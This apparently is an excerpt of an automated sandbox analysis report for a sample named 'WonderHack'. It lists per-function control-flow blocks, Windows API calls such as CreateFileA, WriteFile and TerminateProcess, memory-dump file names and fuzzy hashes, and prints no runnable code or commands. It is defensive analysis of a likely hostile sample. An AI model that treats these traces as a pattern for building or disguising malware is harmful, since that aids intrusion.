                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ff2df82defd979c00d4827294a6fb9d668e3f65475ca4c3da52d3939b6f7d968
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1F71C0B4D05249CFDB00EFA8D58979DBBF0BF08304F14842AE899AB390D734A945DF52

Control-flow Graph (rendered graph for function 00C98730 not reproduced; legend: Executed / Not Executed)
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1704149721.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
• Associated: 00000000.00000002.1704130855.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704182770.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704203677.0000000000CCF000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704224849.0000000000CD0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704246085.0000000000CD4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704266387.0000000000CD7000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704306470.0000000000D21000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c90000_WonderHack.jbxd
Similarity
• API ID: _strcspn
• String ID: @
• API String ID: 3709121408-2766056989
• Opcode ID: d1aafd0dfb41862d66d9eb0839fdcaa209f96a213a209573a15a3627c0592fe5
• Instruction ID: 9b4531097932b68ca07d869a9af3f383784a0ab4bc1ea743a0fa9b2a0f305710
• Opcode Fuzzy Hash: d1aafd0dfb41862d66d9eb0839fdcaa209f96a213a209573a15a3627c0592fe5
• Instruction Fuzzy Hash: F932E2B4904269CFCB24DF64C985B9DBBF1BF49300F0585AAE889A7341D730AE85DF91

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1704149721.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
• Associated: 00000000.00000002.1704130855.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704182770.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704203677.0000000000CCF000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704224849.0000000000CD0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704246085.0000000000CD4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704266387.0000000000CD7000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704306470.0000000000D21000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c90000_WonderHack.jbxd
Similarity
• API ID: ConsoleFreeProtectVirtual
• String ID: @
• API String ID: 621788221-2766056989
• Opcode ID: ebac94ed2751e3d9e19c8277d8e0b77012f9df2ab979ca86fa3223fc368467d2
• Instruction ID: edc25fba559f289bffe5deee0df9afc1bc69aaf4de3e81e145e7a0ffd77c6118
• Opcode Fuzzy Hash: ebac94ed2751e3d9e19c8277d8e0b77012f9df2ab979ca86fa3223fc368467d2
• Instruction Fuzzy Hash: 7C41E2B0D012099FCB04DFA9E48979EBBF0EF48314F15841AE858AB351D774A945CF95

Control-flow Graph

APIs
• GetCurrentProcess.KERNEL32(00CAC9E4,?,00CACB99,00000000,?,?,00CAC9E4,0BDF5ED4,?,00CAC9E4), ref: 00CACAE8
• TerminateProcess.KERNEL32(00000000,?,00CACB99,00000000,?,?,00CAC9E4,0BDF5ED4,?,00CAC9E4), ref: 00CACAEF
• ExitProcess.KERNEL32 ref: 00CACB01
Memory Dump Source
• Source File: 00000000.00000002.1704149721.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
• Associated: 00000000.00000002.1704130855.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704182770.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704203677.0000000000CCF000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704224849.0000000000CD0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704246085.0000000000CD4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704266387.0000000000CD7000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704306470.0000000000D21000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c90000_WonderHack.jbxd
Similarity
• API ID: Process$CurrentExitTerminate
• String ID:
• API String ID: 1703294689-0
• Opcode ID: e9107ca6adb4b38642286b9ce8e1e87ed94561d6ea168791856c5832664b47f3
• Instruction ID: a254adccbeae50df102a8fdeb025ab6bfaf106b1225afdd525d7b24770857724
• Opcode Fuzzy Hash: e9107ca6adb4b38642286b9ce8e1e87ed94561d6ea168791856c5832664b47f3
• Instruction Fuzzy Hash: 96D09231000109ABCF01AF60ED4DEAD3F6AEF41389B044024F91A5A1B1DF719D92FA90

Control-flow Graph (rendered graph for function 00CBAD2D not reproduced; legend: Executed / Not Executed)
APIs
  • Part of subcall function 00CBB0D7: GetConsoleOutputCP.KERNEL32(0BDF5ED4,00000000,00000000,?), ref: 00CBB13A
• WriteFile.KERNEL32(?,?,?,?,00000000,?,00000000,?,?,?,?,?,00CAA691,?,00CAA8F3), ref: 00CBAEB2
• GetLastError.KERNEL32(?,00CAA691,?,00CAA8F3,?,00CAA8F3,?,?,?,?,?,?,?,?,?,?), ref: 00CBAEBC
Memory Dump Source
• Source File: 00000000.00000002.1704149721.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
• Associated: 00000000.00000002.1704130855.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704182770.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704203677.0000000000CCF000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704224849.0000000000CD0000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704246085.0000000000CD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704266387.0000000000CD7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704306470.0000000000D21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_WonderHack.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ConsoleErrorFileLastOutputWrite
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2915228174-0
                                                                                                                                                                                                                                                                          • Opcode ID: 6f536668ab7e515bba6e41e8d367a554caee8a3362fde0cb2d3d0df1d890ed22
                                                                                                                                                                                                                                                                          • Instruction ID: ed2120fedaf663c26f1c6f1866f46ca3904faef9f8ce7bf5ab65d52cfe988d26
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6f536668ab7e515bba6e41e8d367a554caee8a3362fde0cb2d3d0df1d890ed22
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E261B0B1D00159AFDF11CFA8C884EFEBBB9AF19304F140159E954A7252D372DE11DBA2

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 280 cbb506-cbb55b call ca6c90 283 cbb55d 280->283 284 cbb5d0-cbb5e0 call ca2303 280->284 286 cbb563 283->286 288 cbb569-cbb56b 286->288 289 cbb56d-cbb572 288->289 290 cbb585-cbb5aa WriteFile 288->290 291 cbb57b-cbb583 289->291 292 cbb574-cbb57a 289->292 293 cbb5c8-cbb5ce GetLastError 290->293 294 cbb5ac-cbb5b7 290->294 291->288 291->290 292->291 293->284 294->284 295 cbb5b9-cbb5c4 294->295 295->286 296 cbb5c6 295->296 296->284
APIs
• WriteFile.KERNELBASE(?,?,?,?,00000000,00000000,00000000,?,?,00CBAE98,?,00CAA8F3,?,?,?,00000000), ref: 00CBB5A2
• GetLastError.KERNEL32(?,00CBAE98,?,00CAA8F3,?,?,?,00000000,?,?,?,?,?,00CAA691,?,00CAA8F3), ref: 00CBB5C8
Memory Dump Source
• Source File: 00000000.00000002.1704149721.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
• Associated: 00000000.00000002.1704130855.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704182770.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704203677.0000000000CCF000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704224849.0000000000CD0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704246085.0000000000CD4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704266387.0000000000CD7000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704306470.0000000000D21000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c90000_WonderHack.jbxd
Similarity
• API ID: ErrorFileLastWrite
• String ID:
• API String ID: 442123175-0
• Opcode ID: b99a32090b300fb5d9825fb9b3b3898ea79d30c6e50dbd928701ad632cccd945
• Instruction ID: a78c4d5a8cdd8112473116a825e5e3007499efe7603f050be6d175753310a9ba
• Opcode Fuzzy Hash: b99a32090b300fb5d9825fb9b3b3898ea79d30c6e50dbd928701ad632cccd945
• Instruction Fuzzy Hash: 9C21B134A002199FCF25CF19DC80AEDB7B9EB59305F1441AAE906D7211D770EE46CF61

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 297 cb4c19-cb4c1e 298 cb4c20-cb4c38 297->298 299 cb4c3a-cb4c3e 298->299 300 cb4c46-cb4c4f 298->300 299->300 301 cb4c40-cb4c44 299->301 302 cb4c61 300->302 303 cb4c51-cb4c54 300->303 304 cb4cbb-cb4cbf 301->304 307 cb4c63-cb4c70 GetStdHandle 302->307 305 cb4c5d-cb4c5f 303->305 306 cb4c56-cb4c5b 303->306 304->298 308 cb4cc5-cb4cc8 304->308 305->307 306->307 309 cb4c9d-cb4caf 307->309 310 cb4c72-cb4c74 307->310 309->304 311 cb4cb1-cb4cb4 309->311 310->309 312 cb4c76-cb4c7f GetFileType 310->312 311->304 312->309 313 cb4c81-cb4c8a 312->313 314 cb4c8c-cb4c90 313->314 315 cb4c92-cb4c95 313->315 314->304 315->304 316 cb4c97-cb4c9b 315->316 316->304
APIs
• GetStdHandle.KERNEL32(000000F6,?,?,?,?,?,?,?,?,00000000,00CB4B08,00CCEBC0), ref: 00CB4C65
• GetFileType.KERNELBASE(00000000,?,?,?,?,?,?,?,?,00000000,00CB4B08,00CCEBC0), ref: 00CB4C77
Memory Dump Source
• Source File: 00000000.00000002.1704149721.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
• Associated: 00000000.00000002.1704130855.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704182770.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704203677.0000000000CCF000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704224849.0000000000CD0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704246085.0000000000CD4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704266387.0000000000CD7000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704306470.0000000000D21000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c90000_WonderHack.jbxd
Similarity
• API ID: FileHandleType
• String ID:
• API String ID: 3000768030-0
• Opcode ID: 624b952bb542704ffc807e212c17d90654434450c6530992afa7b8e8b8ef9478
• Instruction ID: b04ee44e7e7ef2b420b0e737404aff0064446cc82b1246cd7a8505694fc90fec
• Opcode Fuzzy Hash: 624b952bb542704ffc807e212c17d90654434450c6530992afa7b8e8b8ef9478
• Instruction Fuzzy Hash: 9B11E13120AB414AC7384E3E8DC86A6BE94A796730F38071AD4B7935F2C330DA82D240

Control-flow Graph

APIs
• GetModuleHandleA.KERNEL32 ref: 00C91BC8
• GetModuleFileNameA.KERNEL32 ref: 00C91BE8
  • Part of subcall function 00C91890: CreateFileA.KERNELBASE ref: 00C91913
Memory Dump Source
• Source File: 00000000.00000002.1704149721.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
• Associated: 00000000.00000002.1704130855.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704182770.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704203677.0000000000CCF000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704224849.0000000000CD0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704246085.0000000000CD4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704266387.0000000000CD7000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704306470.0000000000D21000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c90000_WonderHack.jbxd
Similarity
• API ID: FileModule$CreateHandleName
• String ID:
• API String ID: 2828212432-0
• Opcode ID: c032e09deec81b1edd4441fe7f8fb8dc47210257966a06e463db8e0560c7c22f
• Instruction ID: f77b3ace93617928ccc302e7a57bbd5ae18b2416198aa395c72e78a3637e9487
• Opcode Fuzzy Hash: c032e09deec81b1edd4441fe7f8fb8dc47210257966a06e463db8e0560c7c22f
• Instruction Fuzzy Hash: CBF0BDB19042098FCB54EF78D94579DBBF4EB55300F4185BDD8C9D7280EA745A889F82

Control-flow Graph (text form of the rendered graph; executed/not-executed shading is not preserved)
• Basic blocks: 322 cb3187-cb3190; 323 cb31bf-cb31c0; 324 cb3192-cb31a5 RtlFreeHeap; 325 cb31a7-cb31be GetLastError, call caebad, call caeb64
• Edges: 322->323, 322->324, 324->323, 324->325, 325->323
APIs
• RtlFreeHeap.NTDLL(00000000,00000000,?,00CB7421,?,00000000,?,?,00CB70C1,?,00000007,?,?,00CB7A07,?,?), ref: 00CB319D
• GetLastError.KERNEL32(?,?,00CB7421,?,00000000,?,?,00CB70C1,?,00000007,?,?,00CB7A07,?,?), ref: 00CB31A8
Memory Dump Source
• Source File: 00000000.00000002.1704149721.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
• Associated: 00000000.00000002.1704130855.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704182770.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704203677.0000000000CCF000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704224849.0000000000CD0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704246085.0000000000CD4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704266387.0000000000CD7000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704306470.0000000000D21000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c90000_WonderHack.jbxd
Similarity
• API ID: ErrorFreeHeapLast
• String ID:
• API String ID: 485612231-0
• Opcode ID: 05e86eda8f9ffec077e5bdc15647489f64d14fe0daab367c3d94db6c5879c79c
• Instruction ID: 204e15eb50cf7a830a8973e678e2437e088d5a47b947f5e14a7920feb819f7db
• Opcode Fuzzy Hash: 05e86eda8f9ffec077e5bdc15647489f64d14fe0daab367c3d94db6c5879c79c
• Instruction Fuzzy Hash: 8CE08C32100258ABCB112BA4EC0DFDD3B9DAB41795F044024FA0E9A0B0EA348A40DBD8

Control-flow Graph (text form of the rendered graph; executed/not-executed shading is not preserved)
• Basic blocks: 330 ca4cf2-ca4d17; 331 ca4d19-ca4d1b; 332 ca4d20-ca4d28; 333 ca4e12-ca4e1f call ca2303; 334 ca4d2a-ca4d34; 335 ca4d50-ca4d54; 337 ca4d36-ca4d4b; 338 ca4d5a-ca4d69 call ca53c3; 339 ca4e0c; 341 ca4e11; 344 ca4d6b-ca4d6f; 345 ca4d71-ca4da6; 346 ca4db9 call ca4915; 351 ca4da8-ca4dab; 352 ca4dd2-ca4dda; 349 ca4dbe-ca4dd0; 353 ca4dad-ca4db1; 354 ca4def-ca4e0a; 355 ca4ddc-ca4ded call cb088d; 357 ca4db3-ca4db6
• Edges: 330->331, 330->332, 331->333, 332->334, 332->335, 334->335, 334->337, 335->338, 335->339, 337->341, 338->344, 338->345, 339->341, 341->333, 344->346, 345->351, 345->352, 346->349, 349->341, 351->352, 351->353, 352->354, 352->355, 353->339, 353->357, 354->341, 355->339, 355->354, 357->346
Memory Dump Source
• Source File: 00000000.00000002.1704149721.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
• Associated: 00000000.00000002.1704130855.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704182770.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704203677.0000000000CCF000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704224849.0000000000CD0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704246085.0000000000CD4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704266387.0000000000CD7000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704306470.0000000000D21000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c90000_WonderHack.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2391cf4eddf196496c96a7a4b28d23858ac8ef9f6b27d035f2a4c56746a6104e
• Instruction ID: 19cdbaac5a720ba3c6d3c25310e7a0ae521c3d17094242208348993cd50aabd8
• Opcode Fuzzy Hash: 2391cf4eddf196496c96a7a4b28d23858ac8ef9f6b27d035f2a4c56746a6104e
• Instruction Fuzzy Hash: 2A41A03190011BEBCF18DFA9C4909EEB7B9FF8A318B54006AE541E7650E770EA11DBA0

Control-flow Graph (text form of the rendered graph; executed/not-executed shading is not preserved)
• Basic blocks: 359 ca3a58-ca3a72; 360 ca3a7b-ca3a83; 361 ca3a74-ca3a76; 363 ca3aa4-ca3aa8; 364 ca3a85-ca3a8f; 362 ca3b54-ca3b61 call ca2303; 366 ca3aae-ca3abf call ca42e8; 367 ca3b50; 369 ca3a91-ca3aa2; 375 ca3ac1-ca3ac5; 376 ca3ac7-ca3afb; 371 ca3b53; 373 ca3b1d-ca3b1f; 377 ca3b0e call ca340f; 382 ca3afd-ca3b00; 383 ca3b21-ca3b29; 380 ca3b13-ca3b1a; 386 ca3b02-ca3b06; 384 ca3b2b-ca3b3c call cb088d; 385 ca3b3e-ca3b4e; 388 ca3b08-ca3b0b
• Edges: 359->360, 359->361, 360->363, 360->364, 361->362, 363->366, 363->367, 364->363, 364->369, 366->375, 366->376, 367->371, 369->373, 371->362, 373->371, 375->377, 376->382, 376->383, 377->380, 380->373, 382->383, 382->386, 383->384, 383->385, 384->367, 384->385, 385->371, 386->367, 386->388, 388->377
Memory Dump Source
• Source File: 00000000.00000002.1704149721.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
• Associated: 00000000.00000002.1704130855.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704182770.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704203677.0000000000CCF000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704224849.0000000000CD0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704246085.0000000000CD4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704266387.0000000000CD7000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704306470.0000000000D21000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c90000_WonderHack.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 48dea4a6ececec08fc81539f57706c6aecde4fc5b19f5d6e4e44308bce75dc28
• Instruction ID: ced30d8fd00e56c37bb820db7f0e85976fa4613b1a4f30e0ae68d2888b3dad77
• Opcode Fuzzy Hash: 48dea4a6ececec08fc81539f57706c6aecde4fc5b19f5d6e4e44308bce75dc28
• Instruction Fuzzy Hash: 7831863290015BAFCF14CEA8D8909EDB7B9BF0A324B140265F552E7290D721EA44DBA0

Control-flow Graph

APIs
  • Part of subcall function 00CA2B03: GetModuleHandleExW.KERNEL32(00000002,00000000,00C9E5B1,?,?,00CA2AC6,?,?,00CA2A97,?,?,?,00C9E5B1), ref: 00CA2B0F
• FreeLibraryWhenCallbackReturns.KERNEL32(?,00000000,0BDF5ED4,?,?,?,00CC3374,000000FF), ref: 00CA2BF9
  • Part of subcall function 00C9B920: std::_Throw_Cpp_error.LIBCPMT ref: 00C9B94C
  • Part of subcall function 00C9B920: std::_Throw_Cpp_error.LIBCPMT ref: 00C9B968
  • Part of subcall function 00CA5C60: ReleaseSRWLockExclusive.KERNEL32(?,?,?,00C9B9E9,?,00C9FD92), ref: 00CA5C75
Memory Dump Source
• Source File: 00000000.00000002.1704149721.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
• Associated: 00000000.00000002.1704130855.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704182770.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704203677.0000000000CCF000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704224849.0000000000CD0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704246085.0000000000CD4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704266387.0000000000CD7000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704306470.0000000000D21000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c90000_WonderHack.jbxd
Similarity
• API ID: Cpp_errorThrow_std::_$CallbackExclusiveFreeHandleLibraryLockModuleReleaseReturnsWhen
• String ID:
• API String ID: 1423221283-0
• Opcode ID: 65d7f065ddc5d293d44d56bb16298e7214f18f89eb19d6eafe4dd0948ab615a2
• Instruction ID: 8bd04937281f40e050dfb7b569715d37a2ad7e11b7e0b654c542c1b5944d25f7
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 65d7f065ddc5d293d44d56bb16298e7214f18f89eb19d6eafe4dd0948ab615a2
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 32110832604A266BCF256F19FD05B6EB764EB42B34F18441BF812976E1CF34DD01D654

Control-flow Graph
(Rendered graph omitted; legend: Executed / Not Executed. Basic blocks cb41c4-cb41ee through cb4245-cb4248, with calls to cb40f9, GetProcAddress and ca9e6f.)
Memory Dump Source
• Source File: 00000000.00000002.1704149721.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
• Associated: 00000000.00000002.1704130855.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704182770.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704203677.0000000000CCF000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704224849.0000000000CD0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704246085.0000000000CD4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704266387.0000000000CD7000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704306470.0000000000D21000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c90000_WonderHack.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2ec9cc7a3e9b350dae88c8026901d868b03b69af8295fa6f5c82feb27cf2f00a
• Instruction ID: d1adcca3b91be156c53a90a99df3e778d31a71f8f1667ba7b41ea247852a353c
• Opcode Fuzzy Hash: 2ec9cc7a3e9b350dae88c8026901d868b03b69af8295fa6f5c82feb27cf2f00a
• Instruction Fuzzy Hash: F001F5376042255F8F0A8FACEC40B9E3769FBC5330F254125F7108B056DA30E801AB81
Memory Dump Source
• Source File: 00000000.00000002.1704149721.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
• Associated: 00000000.00000002.1704130855.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704182770.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704203677.0000000000CCF000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704224849.0000000000CD0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704246085.0000000000CD4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704266387.0000000000CD7000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704306470.0000000000D21000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c90000_WonderHack.jbxd
Similarity
• API ID: CriticalLeaveSection
• String ID:
• API String ID: 3988221542-0
• Opcode ID: a29678f153cd2beab0646b7bd0ea8ddbd1a43a5e5fcd0d7a03e528db0a12a6f2
• Instruction ID: bbf127764190f208fa80cfc2583581e79972a9c4e40206f44e8c1ee5ff6d610d
• Opcode Fuzzy Hash: a29678f153cd2beab0646b7bd0ea8ddbd1a43a5e5fcd0d7a03e528db0a12a6f2
• Instruction Fuzzy Hash: 5C0126366086935BCB158BBCE8797A8BB50FF4333CF20416FF012954D1CB225A10E360
APIs
• RtlAllocateHeap.NTDLL(00000000,?,?,?,00CA22A9,?,?,00C93E32,00001000,?,00C93D7A), ref: 00CB31F3
Memory Dump Source
• Source File: 00000000.00000002.1704149721.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
• Associated: 00000000.00000002.1704130855.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704182770.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704203677.0000000000CCF000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704224849.0000000000CD0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704246085.0000000000CD4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704266387.0000000000CD7000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704306470.0000000000D21000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c90000_WonderHack.jbxd
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
• Opcode ID: 77e8de73e850b3c69e0bced16bd697459c2cb6e4fa55e20a9f9deb6a1ed471a7
• Instruction ID: c2aa1f1338fe46da3346128e3f6835a51fbe9142d0cf236e6974a202fd513456
• Opcode Fuzzy Hash: 77e8de73e850b3c69e0bced16bd697459c2cb6e4fa55e20a9f9deb6a1ed471a7
• Instruction Fuzzy Hash: A2E065311012B297DA21266ADC05BDE765CAB437A0F150121EC29D61D1DF61CF0191A5
APIs
• Concurrency::cancel_current_task.LIBCPMT ref: 00CA08F1
Memory Dump Source
• Source File: 00000000.00000002.1704149721.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
• Associated: 00000000.00000002.1704130855.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704182770.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704203677.0000000000CCF000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704224849.0000000000CD0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704246085.0000000000CD4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704266387.0000000000CD7000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704306470.0000000000D21000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c90000_WonderHack.jbxd
Similarity
• API ID: Concurrency::cancel_current_task
• String ID:
• API String ID: 118556049-0
• Opcode ID: 238d24ba721e6323cc6bf01d29c27b2a15ce58c99b8b4b94d52b965bb8bb163e
• Instruction ID: 36921db8121417e62b8af20efaf6446017f4e9b245892866d890238cb12e6697
• Opcode Fuzzy Hash: 238d24ba721e6323cc6bf01d29c27b2a15ce58c99b8b4b94d52b965bb8bb163e
• Instruction Fuzzy Hash: C1E04F30C0030CEBCF04EBA4E14546DB7B4AF81314F2041A9E84557351DB359E54DB95
APIs
